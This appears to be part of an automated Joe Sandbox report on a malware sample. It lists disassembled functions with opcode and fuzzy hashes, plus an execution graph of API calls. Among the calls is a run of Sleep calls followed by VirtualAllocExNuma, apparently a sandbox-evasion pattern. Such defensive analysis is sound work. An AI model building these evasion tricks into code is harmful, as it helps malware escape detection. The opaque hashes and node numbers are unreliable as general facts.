                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 013BE7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 102efff87f9051ec1ef8214d2c9b309c0b7dd2e765ac6e62723a4c176b776ad4
                                                                    • Instruction ID: 4f499c4f4a0688ca17bb5d8725bbf095c7dc7c56c2893351e86a8ad8348e46de
                                                                    • Opcode Fuzzy Hash: 102efff87f9051ec1ef8214d2c9b309c0b7dd2e765ac6e62723a4c176b776ad4
                                                                    • Instruction Fuzzy Hash: 0F21A6B8D002189FCF10CFA9D885ADEFBF4AB49324F14902AE819B7710D335A945CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 013B1088 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sA$sA
                                                                    • API String ID: 0-4265140970
                                                                    • Opcode ID: 26281f0b1d304353567c3991801c982cad3d65a66a19f1262e6a488db2e7a3d4
                                                                    • Instruction ID: 23a77d678135439b39f43ab30832cdefe38f001cade1b7ce2dcf931a9de1a8d6
                                                                    • Opcode Fuzzy Hash: 26281f0b1d304353567c3991801c982cad3d65a66a19f1262e6a488db2e7a3d4
                                                                    • Instruction Fuzzy Hash: CE4137B5E106199BEB08CFABD8906DEFBB7FFC9200F04C56AC918A7214E73056428F55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B0FC0 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: sA
                                                                    • API String ID: 0-940647364
                                                                    • Opcode ID: 1b2eddd72709e780cc3e5f5da4ee121f76d4de90e3447902a96fa5034e180a7f
                                                                    • Instruction ID: 0572a6e675489796d0210f896a134ec25ba4848f11704094ef3339696c41fbca
                                                                    • Opcode Fuzzy Hash: 1b2eddd72709e780cc3e5f5da4ee121f76d4de90e3447902a96fa5034e180a7f
                                                                    • Instruction Fuzzy Hash: 55616C71E002189FDB14CF6AD8D4A9EBBF2FF8A304F14C4AAD545EA215E730A541CF52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5C30 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d5
                                                                    • API String ID: 0-2429543555
                                                                    • Opcode ID: 5ae8483d7e01f55976d63c050d4b93521a412f2e94eb81d3a1bf6316dfaa19ab
                                                                    • Instruction ID: d26b82fda2fb437419d4d0a95f1840530d496cc3b1d6d96fb51bc5ce49e72f57
                                                                    • Opcode Fuzzy Hash: 5ae8483d7e01f55976d63c050d4b93521a412f2e94eb81d3a1bf6316dfaa19ab
                                                                    • Instruction Fuzzy Hash: DC6137B1E1420A9FCB04CFA9D4805EEFBB6FF88344F14951AD615B7A54E3349A42CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5C20 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d5
                                                                    • API String ID: 0-2429543555
                                                                    • Opcode ID: 95d3572a45dd43339ad790184872934818a4c39993d97efc943d83b660f91f84
                                                                    • Instruction ID: 512100e795cf9b11bb7699edf0bfa2fdf212eec52bf2bc83b4a4782e1e0e25aa
                                                                    • Opcode Fuzzy Hash: 95d3572a45dd43339ad790184872934818a4c39993d97efc943d83b660f91f84
                                                                    • Instruction Fuzzy Hash: 36511AB1E1420ADFCB04CFA9D4819EEFBB2FF88344F14952AD515A7A54E3349A42CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B907E Relevance: .2, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 63dd8b1c35ff4077b14c26f4c81c7169dba1ec39aa7336d2e4a71a308f3d35ec
                                                                    • Instruction ID: 7a1eba2563ab093bea8d0b403f3da39cae3a25317404ba2134ef03460788d0f8
                                                                    • Opcode Fuzzy Hash: 63dd8b1c35ff4077b14c26f4c81c7169dba1ec39aa7336d2e4a71a308f3d35ec
                                                                    • Instruction Fuzzy Hash: 16618EB4E04209CFCB04CFA9D9846EEBBB1FF45308F14806AD705ABB54E7359942DB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B90A8 Relevance: .2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da316b3bc9e30846a34ac7a110353d633ccda8400483e40013cc4e62dc31d54b
                                                                    • Instruction ID: dc8cc79e37e95c6ca31384f8f84a81d87638a581807b03182d6c323ddcd6def7
                                                                    • Opcode Fuzzy Hash: da316b3bc9e30846a34ac7a110353d633ccda8400483e40013cc4e62dc31d54b
                                                                    • Instruction Fuzzy Hash: E9613BB4E0520DCFDB04CFA9D9846EEBBB5FB48308F14802AD605BBB14E7359942CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD71E Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7e7c766a3b74dfd276d988baa0aa8c8021790df9f7fdc896040de0eb44939ef
                                                                    • Instruction ID: 9a8390d0f2a6c9658e7f167f9601b68e7398619d407975cb2859a2290ac46935
                                                                    • Opcode Fuzzy Hash: d7e7c766a3b74dfd276d988baa0aa8c8021790df9f7fdc896040de0eb44939ef
                                                                    • Instruction Fuzzy Hash: 6A61F0B4D002588FDB10CFE9C8857DEBBB1BB49318F14812AE919BBB50EB749846CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B6230 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f63c3d09d66c0a233befdd6f08593ace1c00424345fb57999d816b65e8526ee
                                                                    • Instruction ID: 53710a0512a0d470ff4a92f576a39b3546356575173f4b8c7fda2c4933bae48a
                                                                    • Opcode Fuzzy Hash: 0f63c3d09d66c0a233befdd6f08593ace1c00424345fb57999d816b65e8526ee
                                                                    • Instruction Fuzzy Hash: 837124B4E046098FDB04CFA9C9818DEFBF2FF88214F24912AD515BB614E73499018F64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5928 Relevance: .2, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f10959d351f4122cea4a3ab7d60b3d2fb107d1f672e1a4567af56c39b9cd348f
                                                                    • Instruction ID: 35c782635fa973f151c5743770bae096a21c07ad1b10bc67ad04bf6831f35edb
                                                                    • Opcode Fuzzy Hash: f10959d351f4122cea4a3ab7d60b3d2fb107d1f672e1a4567af56c39b9cd348f
                                                                    • Instruction Fuzzy Hash: E171F2B4E0421ACFCB04CF99C5809EEFBB5FF89324F14852AD515AB615E730A982CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5918 Relevance: .2, Instructions: 157COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67cd829478fdde8961a0806ba8a7fc95ab56d87d22c0cbf5883c931702f928aa
                                                                    • Instruction ID: f0c6f9077c3e060a43f0d403057056aa3deb4d5b43011089c29b1dbe17eaf29a
                                                                    • Opcode Fuzzy Hash: 67cd829478fdde8961a0806ba8a7fc95ab56d87d22c0cbf5883c931702f928aa
                                                                    • Instruction Fuzzy Hash: 4361E474E0520ACFCB04CFA9C4809EEFBB1FF89314F18856AD515AB615E730A982CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BE430 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74b261d25518fa8958e90f9820f4632eb48b9ae1b095d96b44003a0d890a7c7a
                                                                    • Instruction ID: bf7fa40fc5531f268f10ac6a708d168b6c281405ae91d85e8fe872e1ba73757c
                                                                    • Opcode Fuzzy Hash: 74b261d25518fa8958e90f9820f4632eb48b9ae1b095d96b44003a0d890a7c7a
                                                                    • Instruction Fuzzy Hash: 8251DFB4D10258DFDB14CFA9C885BEDBBB1BB49308F10812AE515BBB50EB749845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BE800 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1672d60f2b8cff8ee73b91301e75e89b73fb96ba4cbc3aba3618e84555ae8e67
                                                                    • Instruction ID: 070cb96df900364d9c4c3861b690e4021ee26b8dd3563ee2d0a883b0a567deea
                                                                    • Opcode Fuzzy Hash: 1672d60f2b8cff8ee73b91301e75e89b73fb96ba4cbc3aba3618e84555ae8e67
                                                                    • Instruction Fuzzy Hash: 9951FEB4D102189FDB14CFA9C885BDEBBB1BF49308F10912AE915BB750EB749849CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013BD728 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91298c866969c785a1d4f5a0f4bfc25ccae4975f195d709b4dccae90cb8c819a
                                                                    • Instruction ID: c13758752cf82225c0f2974e6a7975a37a2c379c359a5badb333f9e1776b425b
                                                                    • Opcode Fuzzy Hash: 91298c866969c785a1d4f5a0f4bfc25ccae4975f195d709b4dccae90cb8c819a
                                                                    • Instruction Fuzzy Hash: 7651E0B4D002589FDB14CFE9C8857DEBBB1BB49308F148129E519BBB50EB749845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5FC8 Relevance: .1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a69a06abdfc661d5c71d72d4721bfe8b9b698fe4b03ef1b41b2b95465707f7f
                                                                    • Instruction ID: d62b0f25f79cd69244fe70f84bcfb500aa4c69ecd38e71f167319a47394e2c23
                                                                    • Opcode Fuzzy Hash: 9a69a06abdfc661d5c71d72d4721bfe8b9b698fe4b03ef1b41b2b95465707f7f
                                                                    • Instruction Fuzzy Hash: 0E513FB0E0860A9FDB04CFAAC4825EEFBF6FF88304F14D42AC515A7655E73496428F94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B6498 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b05f4f70ed357925c6a79ecef8ff837f887cc46518d771538da2cc9816ec23c5
                                                                    • Instruction ID: 8dc819331195fba2706600bb2c69751bb7f42e4597fc0aae796a5c6d1e2b6dcb
                                                                    • Opcode Fuzzy Hash: b05f4f70ed357925c6a79ecef8ff837f887cc46518d771538da2cc9816ec23c5
                                                                    • Instruction Fuzzy Hash: 2B413AB0E0560A9FCB04CFA9C5825EEFBF6FF89304F24D46AC505B7615E7349A418BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B5FD8 Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce1dda6f46bf7c0db993f1c85fbe3fbd9a6dde781f35be239dfc36bc033038d8
                                                                    • Instruction ID: e20152a7afb911243d7615a5292e5475a7dbdc97da53272259679efb26cf4c42
                                                                    • Opcode Fuzzy Hash: ce1dda6f46bf7c0db993f1c85fbe3fbd9a6dde781f35be239dfc36bc033038d8
                                                                    • Instruction Fuzzy Hash: 8E511AB0E0860ADFDB04CFAAC4815EEFBB6FF88314F24D42AC515A7655E73496418F94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B64A8 Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f52f3b0d69dcff276d1121a47ff86f89525b944c8e07c2fdb242d0b1d71fb571
                                                                    • Instruction ID: be8acd6c57fc7193b1023881f409c22cacc6ca8a55fd53b1e5231b74170b3a61
                                                                    • Opcode Fuzzy Hash: f52f3b0d69dcff276d1121a47ff86f89525b944c8e07c2fdb242d0b1d71fb571
                                                                    • Instruction Fuzzy Hash: 694129B0E0560ADFCB04CFE9D5815EEFBF6BB88304F24D469C505B7615E7389A418B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B6F31 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 249816c78f2daf64e0885d0daed1e88567f58e5f3c5a67e16f2c6dd359eb488d
                                                                    • Instruction ID: 532ebfdd22e22a7e22e6ba46ecef4132ff9ad5df364f39a8bf357a4957c3c5b1
                                                                    • Opcode Fuzzy Hash: 249816c78f2daf64e0885d0daed1e88567f58e5f3c5a67e16f2c6dd359eb488d
                                                                    • Instruction Fuzzy Hash: A731AD71E056589BDB59CF6B8C542CABBF3AFC9300F14C1BAD40CAB265DB3049468F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013B6F48 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 243404e80377ecc84d2794772721f1086f30bd2a3b42573887c1779223b83b83
                                                                    • Instruction ID: e9d27ea38ff36edcd09aaa180da09e0127c93c4fd87d4321f97e97034cc2bb4e
                                                                    • Opcode Fuzzy Hash: 243404e80377ecc84d2794772721f1086f30bd2a3b42573887c1779223b83b83
                                                                    • Instruction Fuzzy Hash: A4318971E016288BDB68CF6BDD446DEFBF7AFC9300F14C1BA950CA6264EB3059858E40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:9.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:6.2%
                                                                    Total number of Nodes:1648
                                                                    Total number of Limit Nodes:24
                                                                    execution_graph 22587 41fe0f 22627 427300 22587->22627 22589 41fe1b GetStartupInfoW 22590 41fe2f HeapSetInformation 22589->22590 22592 41fe3a 22589->22592 22590->22592 22628 4230bc HeapCreate 22592->22628 22593 41fe88 22594 41fe93 22593->22594 22733 41fde6 66 API calls 3 library calls 22593->22733 22629 42604e GetModuleHandleW 22594->22629 22597 41fe99 22598 41fea4 __RTC_Initialize 22597->22598 22734 41fde6 66 API calls 3 library calls 22597->22734 22654 427558 GetStartupInfoW 22598->22654 22602 41febe GetCommandLineA 22667 429105 GetEnvironmentStringsW 22602->22667 22609 41fee3 22691 428dd4 22609->22691 22612 41fee9 22613 41fef4 22612->22613 22737 4233a7 66 API calls 3 library calls 22612->22737 22711 423186 22613->22711 22616 41fefc 22617 41ff07 22616->22617 22738 4233a7 66 API calls 3 library calls 22616->22738 22717 428d75 94 API calls 2 library calls 22617->22717 22620 41ff0d 22718 40be94 Sleep Sleep Sleep Sleep Sleep 22620->22718 22623 41ff37 22740 423389 66 API calls _doexit 22623->22740 22626 41ff3c __mtinitlocknum 22627->22589 22628->22593 22630 426062 22629->22630 22631 42606b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 22629->22631 22750 425d9b 70 API calls _free 22630->22750 22635 4260b5 TlsAlloc 22631->22635 22634 426067 22634->22597 22636 426103 TlsSetValue 22635->22636 22637 4261c4 22635->22637 22636->22637 22638 426114 22636->22638 22637->22597 22741 42312f 22638->22741 22643 4261bf 22758 425d9b 70 API calls _free 22643->22758 22644 42615c DecodePointer FlsAlloc 22644->22643 22646 42617b 22644->22646 22751 422019 22646->22751 22649 42618f DecodePointer 22650 4261a0 22649->22650 22650->22643 22651 4261a4 22650->22651 22757 425dd8 66 API calls 4 library calls 22651->22757 22653 4261ac GetCurrentThreadId 22653->22637 22655 422019 __calloc_crt 66 API calls 22654->22655 22661 427576 22655->22661 22656 41feb2 22656->22602 22735 4233a7 66 API calls 3 library calls 22656->22735 22657 427721 GetStdHandle 22660 4276eb 22657->22660 22658 422019 __calloc_crt 66 API calls 22658->22661 22659 427785 SetHandleCount 22659->22656 22660->22657 22660->22659 22662 427733 GetFileType 22660->22662 22665 427759 InitializeCriticalSectionAndSpinCount 22660->22665 22661->22656 22661->22658 22661->22660 22666 42766b 22661->22666 22662->22660 22663 4276a2 InitializeCriticalSectionAndSpinCount 22663->22656 22663->22666 22664 427697 GetFileType 22664->22663 22664->22666 22665->22656 22665->22660 22666->22660 22666->22663 22666->22664 22668 429121 WideCharToMultiByte 22667->22668 22669 41fece 22667->22669 22671 429156 22668->22671 22672 42918e FreeEnvironmentStringsW 22668->22672 22680 42904a 22669->22680 22772 421fd4 22671->22772 22672->22669 22675 429164 WideCharToMultiByte 22676 429182 FreeEnvironmentStringsW 22675->22676 22677 429176 22675->22677 22676->22669 22778 41daaa 66 API calls 2 library calls 22677->22778 22679 42917e 22679->22676 22681 429064 GetModuleFileNameA 22680->22681 22682 42905f 22680->22682 22684 42908b 22681->22684 22810 4259fe 22682->22810 22804 428eb0 22684->22804 22686 41fed8 22686->22609 22736 4233a7 66 API calls 3 library calls 22686->22736 22688 421fd4 __malloc_crt 66 API calls 22689 4290cd 22688->22689 22689->22686 22690 428eb0 _parse_cmdline 76 API calls 22689->22690 22690->22686 22692 428ddd 22691->22692 22694 428de2 _strlen 22691->22694 22693 4259fe ___initmbctable 94 API calls 22692->22693 22693->22694 22695 422019 __calloc_crt 66 API calls 22694->22695 22698 428df0 22694->22698 22701 428e17 _strlen 22695->22701 22696 428e66 22993 41daaa 66 API calls 2 library calls 22696->22993 22698->22612 22699 422019 __calloc_crt 66 API calls 22699->22701 22700 428e8c 22994 41daaa 66 API calls 2 library calls 22700->22994 22701->22696 22701->22698 22701->22699 22701->22700 22704 428ea3 22701->22704 22992 41e192 66 API calls _sprintf 22701->22992 22995 4239b9 10 API calls __call_reportfault 22704->22995 22707 428eaf 22709 428f3c 22707->22709 22996 42e8bf 76 API calls x_ismbbtype_l 22707->22996 22708 42903a 22708->22612 22709->22708 22710 42e8bf 76 API calls __wincmdln 22709->22710 22710->22709 22713 423194 __IsNonwritableInCurrentImage 22711->22713 22997 42d40c 22713->22997 22714 4231b2 __initterm_e 22716 4231d3 __IsNonwritableInCurrentImage 22714->22716 23000 41ed20 76 API calls __cinit 22714->23000 22716->22616 22717->22620 23001 40107b 22718->23001 22725 40be20 8 API calls 22726 40bfb4 Sleep Sleep 22725->22726 22727 40be20 8 API calls 22726->22727 22728 40bfc7 Sleep Sleep 22727->22728 23053 401000 GetCurrentProcess VirtualAllocExNuma 22728->23053 22733->22594 22734->22598 22739 42335d 66 API calls _doexit 22739->22623 22740->22626 22759 425d55 RtlEncodePointer 22741->22759 22743 423137 __init_pointers __initp_misc_winsig 22760 4294c2 EncodePointer 22743->22760 22745 42315d EncodePointer EncodePointer EncodePointer EncodePointer 22746 42785f 22745->22746 22747 42786a 22746->22747 22748 427874 InitializeCriticalSectionAndSpinCount 22747->22748 22749 426158 22747->22749 22748->22747 22748->22749 22749->22643 22749->22644 22750->22634 22753 422022 22751->22753 22754 42205f 22753->22754 22755 422040 Sleep 22753->22755 22761 42637a 22753->22761 22754->22643 22754->22649 22756 422055 22755->22756 22756->22753 22756->22754 22757->22653 22758->22637 22759->22743 22760->22745 22762 426386 22761->22762 22768 4263a1 22761->22768 22763 426392 22762->22763 22762->22768 22770 422147 66 API calls __getptd_noexit 22763->22770 22765 4263b4 RtlAllocateHeap 22767 4263db 22765->22767 22765->22768 22766 426397 22766->22753 22767->22753 22768->22765 22768->22767 22771 4235e2 DecodePointer 22768->22771 22770->22766 22771->22768 22773 421fdd 22772->22773 22775 422013 22773->22775 22776 421ff4 Sleep 22773->22776 22779 41dae4 22773->22779 22775->22672 22775->22675 22777 422009 22776->22777 22777->22773 22777->22775 22778->22679 22780 41db61 22779->22780 22788 41daf2 22779->22788 22802 4235e2 DecodePointer 22780->22802 22782 41db67 22803 422147 66 API calls __getptd_noexit 22782->22803 22785 41db20 RtlAllocateHeap 22786 41db59 22785->22786 22785->22788 22786->22773 22788->22785 22789 41db4d 22788->22789 22790 41dafd 22788->22790 22794 41db4b 22788->22794 22799 4235e2 DecodePointer 22788->22799 22800 422147 66 API calls __getptd_noexit 22789->22800 22790->22788 22796 42359a 66 API calls 2 library calls 22790->22796 22797 4233eb 66 API calls 7 library calls 22790->22797 22798 423105 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 22790->22798 22801 422147 66 API calls __getptd_noexit 22794->22801 22796->22790 22797->22790 22799->22788 22800->22794 22801->22786 22802->22782 22803->22786 22806 428ecf 22804->22806 22808 428f3c 22806->22808 22814 42e8bf 76 API calls x_ismbbtype_l 22806->22814 22807 42903a 22807->22686 22807->22688 22808->22807 22809 42e8bf 76 API calls __wincmdln 22808->22809 22809->22808 22811 425a07 22810->22811 22812 425a0e 22810->22812 22815 425864 22811->22815 22812->22681 22814->22806 22816 425870 __mtinitlocknum 22815->22816 22846 425f05 22816->22846 22820 425883 22867 4255ff 22820->22867 22823 421fd4 __malloc_crt 66 API calls 22824 4258a4 22823->22824 22825 4259c3 __mtinitlocknum 22824->22825 22874 42567b 22824->22874 22825->22812 22828 4259d0 22828->22825 22832 4259e3 22828->22832 22888 41daaa 66 API calls 2 library calls 22828->22888 22829 4258d4 InterlockedDecrement 22830 4258e4 22829->22830 22831 4258f5 InterlockedIncrement 22829->22831 22830->22831 22884 41daaa 66 API calls 2 library calls 22830->22884 22831->22825 22833 42590b 22831->22833 22889 422147 66 API calls __getptd_noexit 22832->22889 22833->22825 22885 4279d9 66 API calls 2 library calls 22833->22885 22837 4258f4 22837->22831 22840 42591f InterlockedDecrement 22841 42599b 22840->22841 22842 4259ae InterlockedIncrement 22840->22842 22841->22842 22886 41daaa 66 API calls 2 library calls 22841->22886 22887 4259c5 LeaveCriticalSection _doexit 22842->22887 22845 4259ad 22845->22842 22890 425e8c GetLastError 22846->22890 22848 425f0d 22849 425879 22848->22849 22904 4233a7 66 API calls 3 library calls 22848->22904 22851 42555b 22849->22851 22852 425567 __mtinitlocknum 22851->22852 22853 425f05 __getptd 66 API calls 22852->22853 22854 42556c 22853->22854 22857 42557e 22854->22857 22911 4279d9 66 API calls 2 library calls 22854->22911 22856 42559c 22859 4255e5 22856->22859 22862 4255b3 InterlockedDecrement 22856->22862 22863 4255cd InterlockedIncrement 22856->22863 22858 42558c __mtinitlocknum 22857->22858 22910 4233a7 66 API calls 3 library calls 22857->22910 22858->22820 22913 4255f6 LeaveCriticalSection _doexit 22859->22913 22862->22863 22864 4255be 22862->22864 22863->22859 22864->22863 22912 41daaa 66 API calls 2 library calls 22864->22912 22866 4255cc 22866->22863 